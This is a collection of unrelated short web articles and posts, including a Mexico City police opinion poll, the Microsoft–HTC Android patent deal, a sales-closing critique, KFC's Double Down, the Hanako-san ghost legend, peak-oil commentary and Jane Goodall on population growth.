NI PARA BIEN NI PARA MAL La mayoría de la población afirma no haber sido extorsionada , pero también asegura no haber recibido algún tipo de ayuda .
( Foto : Archivo EL UNIVERSAL )
Poco a poco la policía del DF se va ganando la confianza de la población .
Hace menos de cinco años , en agosto de 2005 , sólo 21 % de los capitalinos tenía una buena o muy buena opinión ; ahora es 33 % de la gente la que tiene esa opinión
No , that 's no mistake : Microsoft and HTC on Tuesday jointly announced a patent deal that will provide " broad coverage under Microsoft 's patent portfolio for HTC 's mobile phones running the Android mobile platform . "
No , that 's no mistake : Microsoft and HTC on Tuesday jointly announced a patent deal that will provide " broad coverage under Microsoft 's patent portfolio for HTC 's mobile phones running the Android mobile platform . "
The companies are n't releasing a whole lot about the deal , save for the fact that " HTC will pay Microsoft an undisclosed sum for these IP [ intellectual property ] rights . "
The announcement comes in the wake of a massive patent suit from Apple , which alleged 20 instances of patent infringement on the part of HTC .
And Microsoft , of course , does n't own the patents surrounding the Android operating system , which was designed by Google .
The implication , of course , is that Microsoft convinced HTC that Microsoft 's patents could intersect the Android technology .
A statement issued today by Microsoft makes a big point to strike a very different tone .
" HTC and Microsoft have a long history of technical and commercial collaboration , and today 's agreement is an example of how industry leaders can reach commercial arrangements that address intellectual property , " Microsoft IP corporate vice president Horacio Gutierrez said in a statement .
" We are pleased to continue our collaboration with HTC . "
Beneath that rhetoric of unity , however , is an implication that , given the chance , Microsoft may go after other Android handset manufacturers who infringe on its IP .
Originally posted to Gearlog .
Let ’s pull out all the stops on this .
Aggressive , constant closing is just about the worst thing most salespeople can do .
Closing kills more sales than it gets , and ruins future sales by squelching relationships .
If you still have those old “ 50 Closing Strategies ” books gathering dust , get rid of them .
If you still believe in ABC — Always Be Closing — I want to convince you once and for all to stop it .
And sales managers , please read on : because at every quarter ’s end , when you exhort the troops to bring the numbers in , all you ’re doing is telling them to close .
And you are constructing a circular firing squad when you do it .
I ’ve had a few things to say about this in the past , not just about closing but about the paradox of selling , and about why so much in sales these days works to defeat trust , hence defeat sales .
As Yogi Berra said , you could look it up .
Do n’t Take My Word that Closing is Bad : Take Konrath and Rackham’s
Jill Konrath is a highly - respected author , sales consultant , and blogger .
She ’s even less ambiguous than I am : “ I will never , ever train people on closing techniques if they sell to the corporate marketplace . ”
In Neil Rackham ’s perennial best - seller SPIN Selling , he describes results of research on closing for both low - priced and high - priced goods .
• For low - priced goods , training sellers in closing techniques resulted in slightly shorter sale times , and a slightly increased rate of sale ( 76 % vs. 72 % ) .
Meaning — a slight improvement by increasing closing techniques .
• For higher - priced goods , training sellers in closing techniques also resulted in shorter sales transaction times — but it also resulted in less sales — 33 % vs. 42 % before being trained in closing .
In other words : closing may increase efficiency and slightly improve your results if you ’re selling copy paper , and low cost add - on products ( “ you want fries with that ” is actually a good use of closing : take note , McD ’s countermen ) .
But if you ’re selling any kind of professional services , or most anything over a few hundred dollars –the better you get at closing , the less you sell !
Oh well , at least you get shot down faster !
Rackham ’s data was from a few decades ago .
Do you think closing techniques have gotten more effective , or less effective , in today ’s times ?
Yup , that ’s right .
The Real Culprits : Sales Management and the Training Industry
Salespersons have their own battles to fight .
But their job is made immeasurably harder by those who design the sales environments .
Ask yourself , which business strategy works better : one that is executed consistently over a long time period , or one that is given a new endpoint every few months ?
It ’s the same with relationships — business or personal .
In personal relationships , we talk about people who are commitment - phobic , or about players — those looking only for one - night stands .
In effect , those are what the quarterly insistence on cleaning up the numbers makes your salespeople .
Following is a quote from a sales training newsletter I received a week ago :
Charles , with only three days to go until the end of the month ( and end of the first quarter ) , it is time to push hard to exceed budgets .
This month we focused on planning and preparation , but it is now tome [ sic ] for all your hard work to pay off .
As it is time to close , we have put up a small selection of articles on our homepage to help you .
Members can log in and search for thousands more articles and resources , including over 40 more articles all on sales closing .
Presumably somebody buys this stuff .
But let ’s be clear about what it is : the intellectual version of crack .
It urges you to give up on long - term plans and relationships , and subordinate them to the siren call of the “ here - now . ”
Worse , it is entirely self - centered — urging the seller to bend the client , and particularly the client ’s wallet , to the will of the seller .
Here ’s how Neil Rackham puts it : “ When salespeople are under pressure to produce short - term results and are being told to get the business this month by whatever means necessary , they pressure customers and this creates suspicion and mistrust . ”
Exactly .
So if you ’re a sales manager in a business that is n’t small - dollar and ancillary , and if you ’re pushing your people to step up the closing at quarter ’s end , then you are creating suspicion and mistrust .
Which ruins sales in the medium and long term .
Who cuts off their nose to spite their face that way ?
Besides crack addicts , I mean ?
Never mind .
Just stop closing .
In its place , substitute constant striving to improve results and relationships for your clients .
If that feels too vague , then use Jill Konrath ’s suggestion : focus on the Next Logical Step .
You ’ll sell more .
And sleep better too .
You can forward your student email to a non-UQ address .
To set up email forwarding , follow these steps :
Log in to your student email .
Go to Settings at the top of the page .
Type ' forwarding ' into the ' Search all settings ' box and click the result ' Forwarding ' .
Click ' Start forwarding ' .
Enter your preferred email address under ' Forward my emails to ' .
Tick the box ' Keep a copy of forwarded messages ' .
If something goes wrong , you 'll still have a copy of your messages .
Click ' Save ' .
You can forward your student email to another UQ address , but it is not recommended or supported .
Today we ’re very happy to announce the new Creately Team plans .
We have seen that many of you use Creately in your own project teams already .
But it has not been easy to manage who is in your team , who is being billed and for which plan or even which plan a team member requires .
Creately Team plans solve these issues .
The Team plans are perfect for cross-functional Business , Design and Development Teams .
If you run a consulting business , a design house or a development team – in fact if you are part of any team where visual communication and collaboration is key , the Creately Team Plan is designed for you .
Better Team Management
Creately Team plans start from just $ 8.95 / user / month with a minimum of 3 users in a plan .
We think you ’ll agree that this is excellent value with the entire team receiving all the capabilities of our Pro plan ( $ 9.95 / month ) plus enhancements to project sharing .
As the team owner you also have access to the team management portal which allows you to easily add and remove team members , assign new roles and dynamically increase or decrease your team size .
The beauty of this is you only ever pay for the number of team members in your team .
We do n’t pigeon hole you by team size .
At -a-Glance
Here ’s a quick look at exactly what you ’ll get on the new Team Plan :
Unlimited Export & Publishing with no Creately watermark
Unlimited Diagram Storage
Unlimited Diagram Sharing
Unlimited Project Workspaces
Project Sharing with no limitations , everyone on the Team can create diagrams in your Projects
User management to add and remove Users from your Team account
Team contact list so its easier to share within your Team
Multiple administrator levels to manage large , distributed Project Teams
Pay by Credit Card or Paypal
Unlike the Pro and Plus Plans , the new Team Plans lets you invite collaborators from your Team account to work on existing documents and create new documents inside shared projects .
This makes project collaboration hassle free and lets you control who has access to which project documents .
We ’re confident the Creately Team plans will suit you and your project team .
Click here to upgrade to a Creately Team plan right away .
PS .
Special thanks to everyone who ’s helped us along the way with your support , feedback and kind words .
The @Creately Team
The Garry Shandling Movie Poster Project
A few years ago ( 2006 ? ) while we were deep in the midst of making Tom Goes to the Mayor , myself , Doug Lussenhop and the artists of TGTTM ( Kevin Gallegly , Jordan Kim , Chris Shapan ) created these movies posters with Gary Shandling puns .
I do n’t remember why .
I was just a silly thing to do .
I have long forgotten who did which one , so if you ’d like to claim owndership of them , let me know and I ’ll add credits .
also please , friends , submit your own shandling poster and I will add to this stream .
Doug Lussenhop
Doug Lussenhop
Doug Lussenhop
Doug Lussenhop
Doug Lussenhop
Tim Heidecker
Doug Lussenhop
Doug Lussenhop
Doug Lussenhop
Doug Lussenhop
Tim Heidecker
Tim Heidecker
Tim Heidecker
Tim Heidecker
Doug Lussenhop
Tim Heidecker
Tim Heidecker
Tim Heidecker
Doug Lussenhop
Doug Lussenhop
Doug Lussenhop
Jordan Kim
Jordan Kim
— — — — — — —— ——
–
FROM THE TWITTER :
@usebombs
@justin_allen
@seangdonaldson
@timboslice8
@fsimmons
@ghostofselleck
@sgaudemar
@Sanvean75
@BryanMillerShow
@Mondo13
@sweetgarbage
@ Tess ( Should n’t this have been Cool Shand Luke ? )
@mrbradles
@dril
Tory Harris
@seangdonaldson
@danielrudy
@nineteen84
@nineteen84
@nineteen84
@famouspolicedog
@cohawk
@thebrowncape
@thebrowncape
@georgecortez
@steveagee
@nickmachia
@joshcairney
@mobius1ski
A Clinton woman is facing a drunken driving charge after authorities say she drove drunk to town police headquarters .
Andrea Cerwinski , 47 , allegedly wanted to talk to police about an undisclosed family issue , an officer said .
The patrolman talking to Cerwinski smelled alcohol and administered sobriety tests , which she failed , according to a police report .
Cerwinski was charged with driving while intoxicated and reckless driving .
She was released to her husband .
Ra�l Vera , obispo de Saltillo , dijo que la Iglesia requiere una revisi�n en su interior con el prop�sito de mirar hacia las v�ctimas
Ciudad de M�xico | Lunes 12 de abril de 2010
Nurit Mart�nez | El Universal
20:12
Radiohead ’s Jonny Greenwood will reportedly return to film scoring , writing music for an adaptation of Haruki Murakami ’s Norwegian Wood .
The score will be based on a composition Greenwood wrote for the BBC Concert Orchestra .
Greenwood ’s last foray into feature films was his Grammy - nominated soundtrack for Paul Thomas Anderson ’s There Will Be Blood .
Just as that score was derived from an earlier work , Popcorn Superhet Receiver , Greenwood ’s composition expands upon an orchestral piece called Dogwood , which debuted last month .
The maverick musician announced the project at BBC ’s Maida Vale studios , following Dogwood ’s premiere .
“ I wrote [ the ] piece mostly in hotels and dressing rooms while touring with Radiohead , ” he told Twenty FourBit .
“ This was more practical than glamorous – lots of time sitting indoors , lots of instruments about – and aside from picking up a few geographical working titles , I [ do n’t ] think that it had any effect where , on tour , it was written . ”
Greenwood is also listed on the film ’s Imdb page .
Murakami ’s 1987 novel , translated into English in 2000 , follows Toru Watanabe ’s nostalgic recollections of the late 60s .
These memories are spurred by the sitar - strung sound of the Beatles ’ Norwegian Wood .
The film version is directed by Anh Hung Tran , and will be released in Japan in December .
In the meantime , the Maida Vale performance of Dogwood will be re-broadcast by BBC Radio 3 on 19 March .
Greenwood ’s first movie score , for the 2003 documentary Bodysong , will also soon see an encore : it will be released on DVD on 22 March .
( from guardian.co.uk )
France 's main Muslim group says a mosque has been defaced with racist graffiti in the sixth such incident this year .
The head of the French Council of the Muslim Faith says racist words were painted over the weekend on the walls of the mosque in Sorgues , in the picturesque Vaucluse region .
It is the sixth time this year that a French mosque has been tarnished by racist graffiti .
Mohammed Moussaoui says that Muslims now have a right to ask about the " real objectives " behind these acts .
He noted that his group which brings together various Muslim tendencies has called numerous times for a parliamentary inquiry into Islamophobia , to no avail .
Islam is France 's second most - practiced religion after Roman Catholicism .
Enlarge KFC
The KFC Double Down has meat and cheese , no bread .
KFC is putting its chicken where its buns were .
Today , the nation 's largest chicken fast - food chain announced plans to nationally roll out a breadless chicken sandwich that uses two boneless chicken fillets as the bun — then squeezes two pieces of bacon , two slices of cheese and some sauce in between .
READ : KFC press release Drooling yet ?
You 'll have to wait a few days .
The $ 5 sandwich , dubbed the Double Down , will be available at all KFCs on April 12 .
The sandwich , which comes complete with 1,380 milligrams of salt ( about 60 % of what the federal government recommends for an entire day's consumption ) and 10 grams of saturated fat ( about 50 % of a day 's supply ) , would seem to be a slap in the face to nutritionists — and nutrition advocates such as Michelle Obama — calling for more restraint from the nation 's foodmakers .
" It 's a salt bomb , " says Kelly Brownell , director at Yale 's Rudd Center for Food Policy and Obesity .
" That 's a better part of a day 's sodium in one meal . "
The sandwich is not , however , a calorie bomb .
The Original Recipe version is 540 calories — about the same as a Big Mac .
" You can do worse than 540 calories , " Brownell concedes .
For KFC , it 's all about driving buzz and traffic among its heaviest users — guys ages 18 to 24 , says Javier Benito , executive vice president of marketing and food innovation at KFC .
In consumer studies , he says , young men said they were still hungry after eating chicken sandwiches served on conventional buns .
" They told us they were looking for something meatier , " he says .
The sandwich was tested last year in Providence and Omaha .
" We had people driving across state lines to try the product , " Benito says .
Despite the high salt content of this product , Benito says KFC is committed to lowering salt in its product line overall and is testing a lower - sodium version of its Original Recipe chicken .
The Double Down is a limited time offer that will be available for only six weeks .
What to do with all the buns that wo n't be used in its Double Down chicken sandwiches ?
KFC plans to donate them to food banks .
It will be donating " thousands " of buns to food banks nationally in the next six weeks , he says .
But holding the chicken .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
Hanako - san -- a spooky young girl that haunts school restrooms across Japan -- has in recent decades become one of the nation 's most famous ghosts .
It is not uncommon for schools to have a toilet permanently occupied by the mysterious girl , who is known in Japanese as Toire no Hanako - san ( lit . " Hanako of the toilet " ) .
She is often found in the third stall in the restroom on the third floor -- usually the girls ' room -- but this can vary from school to school .
Details about her physical appearance also vary , but she is usually described as having bobbed hair and wearing a red skirt .
Hanako - san 's behavior also varies according to location , but in most cases , she remains holed up in the bathroom until an adventurous student dares to provoke her .
Hanako - san can be conjured up by knocking on the door to her stall ( usually three times ) , calling her name , and asking a particular question .
The most common question is simply " Are you there , Hanako - san ? "
If Hanako - san is indeed present , she says in a faint voice , " Yes , I 'm here . "
Some stories claim that anyone courageous enough to open the door at this point is greeted by a little girl in a red skirt and then pulled into the toilet .
Toire no Hanako - san , by Digital Dolls
Details about Hanako - san 's origins are murky .
Although she became a national phenomenon in the 1980s , there is speculation that she has existed since the 1950s .
Some stories claim she is the ghost of a WWII - era girl who died in a bombing raid on the school while she was playing hide - and - seek .
Other stories claim she is the restless spirit of a young girl who met her end at the hands of an abusive or deranged parent ( or a perverted stranger , according to some stories ) who found her hiding in the bathroom .
In some cases , she is the ghost of a former student who died in an unfortunate accident at the school ( one story from Fukushima prefecture , for example , claims she is the ghost of a girl who fell out of the library window ) .
Hanako - san photo by Sammi Sparke
Countless versions of the Hanako - san legend have emerged over time .
Here are a few of the more colorful variations :
- According to one Yamagata prefecture legend , something terrible will happen to you if Hanako - san speaks to you in a nasty voice .
Another legend from Yamagata prefecture claims that Hanako - san is actually a 3 - meter - long , 3 - headed lizard that uses a little girl 's voice to attract prey .
- At a school in the town of Kurosawajiri ( Iwate prefecture ) , it is said that a large , white hand emerges from a hole in the floor of the third bathroom stall if you say " third Hanako - san " ( sanbanme no Hanako - san ) .
- In the boys ' room at a school in Yokohama ( Kanagawa prefecture ) , it is said that a bloody hand emerges from the toilet ( presumably an old - fashioned squatter ) if you walk around it three times while calling Hanako - san 's name .
- Stories have also circulated about a so - called " Hanako fungus " that can infect anyone who scrapes their knee on the playground .
The infection reportedly causes tiny mushrooms to sprout from the scab .
Toire no Hanako - san , by HAL - 2oo6
For the most part , Hanako - san is harmless and can be avoided simply by staying away from her designated hiding spot .
But if you ever need to get rid of her , try showing her a graded exam with a perfect score .
Some legends claim that the sight of good grades makes her vanish into thin air .
[ Note : This is the latest in a series of weekly posts on Japanese urban legends . ]
Pin Share Email 0 Shares
As a reminder , this is the second post of a two post series helping you answer the question : Should you sell your house ?
The first post looked at the financial considerations of selling your house .
I discussed costs in selling and buying , interest rates , whether or not selling will help you get out of debt sooner , how long you ’ve been in the house and the current tax credit consideration .
Other Considerations For Selling Your House
This week I ’m going to cover some of the non financial considerations in deciding to sell your house .
These considerations should n’t stand by themselves when making a decision to sell or not to sell .
Just because this is a new post , please weigh them as a whole and with the first post in making a decision that is right for you .
Do you have a good reason to sell ?
Is selling a need or a want ?
Beyond financial questions , your real estate agent is probably going to ask you why you are selling .
In fact , anyone looking at your house will probably ask this question .
Many people have a need to sell such as a job change , or necessary relocation .
Others just want a new house .
The point is really evaluating the necessity of selling .
As you can tell from these posts there is a lot to consider and it can be a stressful time if not well planned .
So , before you put the sign in the front yard because the bathroom is n’t the right color , consider making a list of the reasons to move and ask yourself if it ’s really worth the effort .
Consider the home or house thing ; remove the emotions .
Do you live in a home , or do you live in a house ?
Most men would agree it ’s a house .
But most women look at it well beyond the roof over our heads and see it as a home .
Women will typically look at new houses ( or homes ) in the same way .
While the differences can be funny ( I hope no one is offended ) , the point is both men and women have to take the emotion out of selling .
Truthfully , you have to view it as selling a house because that is how the market looks at it .
The pictures , painting and drapes that can make it homey , do n’t count when selling .
Are you willing to put forth the work ?
There is certainly something to think about here if you are trying to sell an older home .
Actually , even in selling a newer home you might expect to do some minor repairs to make it market ready .
Anytime you get ready to list you want to make sure your house is visually appealing .
Outside it ’s always a good idea to have fresh mulch in the landscaping , flowers and a neat looking yard .
The inside of your house needs to be organized and in order .
If you ca n’t organize it others might think there is n’t enough space , etc .
If you ’re serious about putting your house on the market , try to make it model home ready .
But keep in mind it ’s going to require some work and time .
Are you prepared for neighbor chatter ?
Perhaps you ’ve lived in your neighborhood for a while and have become friendly with the neighbors .
Unless announced in advance , you can imagine there will be some surprise and a lot of “ why ” questions when that sign is seen .
Yes , you ’ll have your neighbors asking all sorts of questions initially .
While this consideration alone is n’t reason enough to sell or not sell , just be prepared for the forthcoming discussions .
Is there a lot of competition ?
I suppose this could be a financial consideration , but I ’ll include it here anyway .
You and your real estate agent need to evaluate how you will handle the competition within your neighborhood , or even around the same area .
What sets your home apart from others ?
Do you have some upgrades and are you priced better than others ?
Do you have a bigger back yard ?
Consider what is going to make your house sell in comparison to a similar house down the street .
What is the overall condition of your house ?
Conditions definitely matter in a lot of cases , especially if you ’re in a market to sell to a family .
One of the things I mentioned in last week ’s article was considering any cost associated to repairs or preparation of your house before listing it .
Think again if you ’ve been putting off fixing that toilet that does n’t flush properly , or perhaps patching the hole in the wall where little Johnny swung his baseball bat too hard .
The little things count when showing your house and you have to be willing to put forth some prep effort .
Consider the simple life .
Consider if selling your house and buying another one will make your life more or less complex .
There is something about house shopping that is similar to car shopping .
Have you heard of new car fever ?
You can easily develop the same thing with looking for a house .
Sometimes , you lose site of the fact that your current commute is only 15 minutes .
But a move to another house in your dream neighborhood will increase your commute considerably .
Is it worth the move ?
Check your contentment monitor .
Beyond the financials and everything else discussed , you need to dig deep and make sure you ’re living a life of peace and contentment .
Do n’t get caught up in chasing after the perfect house , or what the neighbor has because it ’s a never ending race no one can win .
There are probably many other non financial considerations when deciding to sell your house .
Do you have any common examples you can share with readers ?
FRUITNET IS THE PICK OF THE BUNCH
Fruitnet Media International is the world 's leading publisher and event organiser for the international fresh fruit and vegetable business .
Focusing on new growth in established and emerging markets , Fruitnet 's high - quality publications are essential platforms for any company or organisation seeking to raise its industry profile .
Fruitnet events , meanwhile , enable members of the trade to explore commercial opportunities to make new business contacts .
US energy consumption is already down quite a bit -- some might say due to recession , but it seems even more likely that the result is the other way around -- high energy prices squeezed the financial system .
This in turn caused credit availability to drop and demand for oil , gas , and coal to drop .
We have put a huge amount of effort and subsidies into wind and solar , but they hardly show up on the chart .
Ethanol is n't shown separately in the chart this data was taken from -- instead it is combined with wood and with other biofuels in a category called " biomass " in the EIA data .
The biomass line has thickened a bit , but it is still pretty insignificant .
But if one looks at the situation more closely , one discovers that the situation is quite different .
Our energy problems are close at hand , and solutions using what are optimistically called " renewables " are distant and may very well sink the country further into recession .
If a person were to listen to Energy Secretary Steven Chu or National Geographic 's Aftermath : World Without Oil , one might think that our energy problems are fairly minor and distant .
We can easily add sufficiently renewable energy to substitute for fossil fuels in a fairly short time frame .
All we need to do is put our minds ( and pocketbooks ) to it .
The following are a few observations about our current situation :
1 . Even though wind , solar photovoltaic ( PV ) , geothermal , and ethanol are called " renewables " , they cannot be produced without fossil fuels , and need fossil fuels for maintenance .
In many ways , these energy sources should be called " fossil fuel extenders " rather than renewables , because they are very dependent on our current system .
For example , growing corn for ethanol depends on tractors run by diesel for growing the corn , and natural gas or coal to power the ethanol plant .
Corn is fertilized using fertilizers which are often imported , and sprayed with oil - based insecticides .
Wind turbines require regular maintenance , and need to be part of an operating electrical system with fossil fuel back - ups .
Solar PV will continue to make electricity once they have been made , but will not produce round - the - clock electricity unless they are part of an electrical system ( which requires fossil fuels ) or have battery backups which are replaced every few years ( also requiring fossil fuels ) .
2 . World oil production appears to have peaked .
If it has not reached its maximum level , its maximum level is likely only a few years away .
Figure 2 . World oil production ( " Crude and Condensate ) from EIA Table 4.1d from International Petroleum Monthly .
World oil production was increasing quite rapidly through 2004 ( except for slowing down during recessions ) .
In 2005 , the rate of increase dropped , and production has been on a bumpy plateau since -- although 2009 appears to be possibly headed downward -- or at most on a continuing plateau for a while , before heading downward .
There is no longer oil to be found which can be produced inexpensively -- most of it was found long ago , and has already been pumped .
Newer sources of oil tend to be more expensive .
If economies could really afford $ 200 or $ 300 or $ 400 barrel oil , and had unlimited capital , perhaps production could increase some more .
But at some point , we run short of capital for more and more expensive new production , and the high price of oil tips the economy into recession and dampens demand .
Many analyses are reaching the same conclusion about world oil production .
Just this week , a new study from Kuwait predicted oil production may reach a peak and decline in 2014 .
The International Energy Agency has also been talking about the possibility of a peak before 2020 .
3 . Whether the peak in production is from Peak Supply or Peak Demand , the result for the consumer is equally bad -- recession , reduced job availability , and increasing loan defaults .
It does not really matter whether one puts the label " supply constraint " or " demand constraint " on the resulting drop in production -- the effect is the same .
Prices are still high relative to historical prices , even through the world is struggling to emerge from recession , as shown in Figure 3 below .
Figure 3 . Spot oil prices for benchmark West Texas Intermediate .
Graph by EIA .
Oil is essential for food production and transportation .
Consumers tend to cut back on discretionary purchases ( causing recession ) or to default on their loans , if their budgets are squeezed by high prices oil prices .
James Hamilton was one economist showing a link between high oil prices and recession .
4 . Scaling up renewables to replace fossil fuels in current quantities does not look like it has much of a chance of succeeding , even in the long term .
One issue is the point made previously -- it takes fossil fuels to produce renewables like wind and solar PV .
Also , Figure 1 shows our success in scaling up so far has been quite limited .
Scaling up ethanol further would require taking a huge share of our corn crop .
Cellulosic ethanol is n't working out to date , and may never work out .
Wood and other biomass is limited in supply , limiting production if it could be perfected .
There may be some particular applications of renewables which may turn out to work out well -- for example , natural gas from waste , or biofuel from waste grease .
But these tend to be limited in quantity .
Even if we were to , say , discover a way of producing biofuel from algae economically , it would years to work out the details of scaling production up , and a huge amount of investment ( and fossil fuels to make tanks and other apparatus ) to actually produce the biofuel in quantity .
One would probably be looking at more than 30 years before the process could be scaled up sufficiently to start replacing a significant share of our oil production .
5. Natural gas will not solve all of our problems .
There has been considerable publicity about the US having " 100 years of natural gas " available at current usage levels .
There are several issues , however :
a. Natural gas will not run in our current vehicles .
Fixing vehicles to run on natural gas , and adding infrastructure to deliver the gas , is likely to be expensive and take quite a few years .
b . If we were to use natural gas for transportation , supply would run out very quickly -- perhaps 20 years or use , or even less .
Look at natural gas use , compared to oil use on Figure 1 .
c. It is not clear that the " 100 years of natural gas " is available at prices consumers can afford .
If the price is high , we may very well have the same " peak demand " issue we have for oil -- people will not be able to afford huge electric bills and huge home heating bills -- say double today 's level .
d. Scaling up natural gas faces huge challenges .
Our infrastructure is only built for the current usage of natural gas .
Adding more pipes , storage , and end usage is very expensive and time consuming .
If the timing of the new infrastructure is slower than the increase in gas production , gas prices are likely to plunge or stay too low for profitability .
e . There are concerns regarding " fracking " near major water supplies , such as that of New York City .
Expansion of natural gas may not occur to the extent that many are hoping will take place in the 100 year supply numbers .
6 . If increased drilling is done in the US and offshore , is likely to have modest beneficial impact on oil supply , but it is highly unlikely that it will solve our problems .
Gary Luquette , President of Chevron North America Exploration and Production recently wrote :
The good news : the OCS [ Outer Continental Shelf ] has significant potential .
Over time , it could add 1 million more barrels of oil and natural gas equivalent a day -- potentially representing a fifth of the current total U.S. oil production .
Advances in technology could increase that amount dramatically .
One million barrels of oil and natural gas equivalent is great -- certainly more than what we are getting from biofuels or from wind or solar .
If one adds additional onshore production , it could be more than this , perhaps another 1 or even 2 million barrels of oil and natural gas equivalent a day .
But remember , this is n't even all oil -- part of this is natural gas , the problems of which were described in Item 5 , above .
Compared to the world 's oil supply , an additional one million barrels of oil a day about 1 % of world oil production .
Compared to US oil usage , an additional one million barrels of oil a day is about 5 % .
So the additional oil supply would be helpful , ( as would the additional jobs , and reduction in needed imports ) , but it would n't solve all of our problems .
Also , if the price of the new oil supplies turns out to be too expensive ( because , for example , the cost of drilling in deep water is too expensive ) , we may find that the new supplies are really more expensive than the economy can afford .
Oil prices may remain below the cost of production , bringing a fairly quick end to new production - - oil companies will soon quit production , if deep sea ( or other new production ) is clearly a money loser .
7. Renewables tend to be high priced .
If our big problem with oil is high price , renewables will not solve our problems .
Subsidies only hide high price -- the cost to the economy is high , with or without a subsidy .
If we can find cheap renewables , it would be in our interested to expand them as much as possible .
But expanding expensive renewables should be done with great caution , in my opinion .
We have no guarantee regarding how long the renewables will last -- wind is likely only to last as long as fossil fuels supplies are available .
Just because an analysis is done assuming that wind ( or another energy source ) will have a 40 year lifetime does n't mean it will actually last that long .
OOPS !
Sorry , we could n’t find the page you were looking for .
In the meantime , learn more about the Senate by clicking here .
Population growth should be curbed : British expert Goodall
A firm believer in the reality of climate change , Goodall hopes the positive tone of her book will translate into practical action to help conserve the environment in the long term , whether this is through reforestation projects or sensible family planning .
File image courtesy AFP .
by Staff Writers
London ( AFP ) March 24 , 2010
Humans should have fewer babies to help the global battle against climate change , according to the renowned British primatologist and conservationist Jane Goodall .
Goodall , whose 1960s research on chimpanzees changed perceptions of relations between humans and animals , fears the controversial issue has slipped down the agenda in the debate about man 's impact on the environment .
" It 's very frustrating as people do n't want to address this topic , " said the 75 - year - old English scientist .
" It 's our population growth that underlies just about every single one of the problems that we 've inflicted on the planet .
" If there were just a few of us then the nasty things we do would n't really matter and Mother Nature would take care of it -- but there are so many of us , " she told AFP in an interview .
The answer , she says , is that " we should be talking about somehow curtailing human population growth . "
Goodall is a patron of the Optimum Population Trust ( OPT ) , a registered British charity which campaigns for population stabilisation and a gradual decrease both globally and in Britain .
It argues for improved provision of family planning and sex education ; better education and rights for women ; and advocates that couples voluntarily " stop at two " .
The OPT 's stated mission is to reduce projected population growth of 2.3 billion by 2050 by at least 1.3 billion -- to reach no more than eight billion by 2050 instead of the 9.1 billion figure predicted in 2004 by the United Nations Population Division .
Goodall believes a cornerstone in any drive to stabilise population growth , particularly in less developed countries where populations are expanding , must be the improvement in the quality of life of the poorest .
A UN Messenger of Peace -- distinguished figures who agree to focus the world 's attention on the work of the UN -- since 2002 , she also heads a project in the forests of East Africa that aims to combat deforestation by allowing rural dwellers to profit directly from the conservation of their natural environment .
The UN - backed programme known as REDD ( or Reduced Emissions from Deforestation and Degradation ) is being implemented in regions of western Tanzania and Uganda by the Jane Goodall Institute ( JGI ) , a global non-profit organisation she founded .
JGI - Tanzania was awarded a grant of 2.7 million US dollars from the Norwegian Embassy in Tanzania in January to help implement the project which aims to conserve natural habitat while also raising the quality of life among local communities .
-- ' They are struggling to survive ' --
--------------------------------------
" If you do n't improve the lives of the people -- helping the women so that their babies do n't die , providing information about family planning -- then it's very irresponsible , " she told AFP .
" We provide information about family planning and in most cases people are very grateful , including the men interestingly . "
Reforesting large areas of degraded landscape is central to the project 's goal of promoting sustainable use of tropical forests , whose conservation Goodall believes is vital in the fight against climate change because of their ability to " sequester " -- or remove -- CO2 from the atmosphere .
" They ( the local population ) have denuded their hillsides and are struggling to survive -- we 're working on the ground in Tanzania and Uganda teaching people new technology to tackle this problem , " explained Goodall .
" Google Earth have a new kind of cell phone which the local people can use with GPS but also video .
It allows them to map deforested areas by filling in data points -- here the forests are being cut down , here there are new trees .
" If communities can demonstrate that they are having an impact in terms of restoring their forests then they get this money from the carbon polluters . "
Goodall 's belief in the potential benefits of conservation for both humans and animals comes through in her recently - published book " Hope for Animals and Their World : How Endangered Species Are Being Rescued From The Brink " .
In it she relates a number of conservation success stories from different corners of the globe , from the Black Robin of the Chatham Islands near New Zealand to the short - nosed sturgeon of New York 's Hudson River .
A firm believer in the reality of climate change , Goodall hopes the positive tone of her book will translate into practical action to help conserve the environment in the long term , whether this is through reforestation projects or sensible family planning .
" Warming is a cycle but we 've certainly made it worse -- it 's the speed with which it 's happening that 's so terrifying .
" We know the CO2 out there is causing this so should n't we be using our brains , our technology and our skill to do something about it , whether we did it or whether some other force did it ? "
ARROYO GRANDE , Calif. ( MarketWatch ) -- Retire ?
You can fuggetaboutit if the new Global Debt Time Bomb is detonated by any one of 20 made - in - America trigger mechanisms .
Yes , 20 .
And yes , any one can destroy your retirement because all 20 are inexorably linked , a house - of - cards , a circular firing squad destined to self - destruct , triggering the third great Wall Street meltdown of the 21st century , igniting the Great Depression II that George W. Bush , Ben Bernanke , Henry Paulson and now President Obama have simply delayed with their endless knee - jerk , debt - laden wars , stimulus bonanzas and bailouts .
Wow , what an epic Hollywood blockbuster this will make :
You know the drama , ca n't miss the warnings .
The financial press is flooding us with plot lines ... a Forbes cover story focuses on a " Global Debt Bomb : How It Could Wreck Your Life " ... Leaders at the World Economic Forum on Swiss Mt. Davos fear another global meltdown will trigger mass rebellions ...
The Economist calls the plot a " Global Asset Bubble , " with cheap money fast driving up asset prices .
Plus , Bloomberg BusinessWeek is adding jet fuel to the ticking time - bomb in : " After the Stimulus Binge , a Debt Hangover : Trillions of dollars have been spent keeping the global economy afloat .
But now fears about the Great Recession are giving way to worries about something else : The Great Reckoning " when massive debts come due .
Then the debt bomb explodes " and the results wo n't be pretty for investors or elected officials . "
Forbes discovered the trigger mechanism in " This Time Is Different : Eight Centuries of Financial Folly , " by economists Carmen Reinhart and Kenneth Rogoff :
The " 90 % ratio of government debt to GDP is a tipping point in economic growth . "
For 800 years " you increase it over and beyond a high threshold , and boom ! "
Well guess what ?
" The U.S. government - debt - to - GDP ratio is 84 % . "
Soon , Ka-Booom !
Depression .
Kiss your retirement goodbye .
Who knows ?
Forbes ?
Bloomberg BusinessWeek ?
The Economist ?
Davos - World Economic Forum ?
True , they 're all looking at the same plot line for a Hollywood blockbuster about the " Global Debt Time Bomb . "
But the financial press navigates in a fog .
There 's not just one , but many triggers , all linked in a lethal network .
We 've reported on it for years .
Now you tell us :
What triggers this firestorm ?
Poll : 20 economic weapons of mass destruction triggering ticking Global Debt Time Bomb
1. Federal Budget Deficit Bomb .
The Bush / Cheney wars pushed America deep into a debt hole .
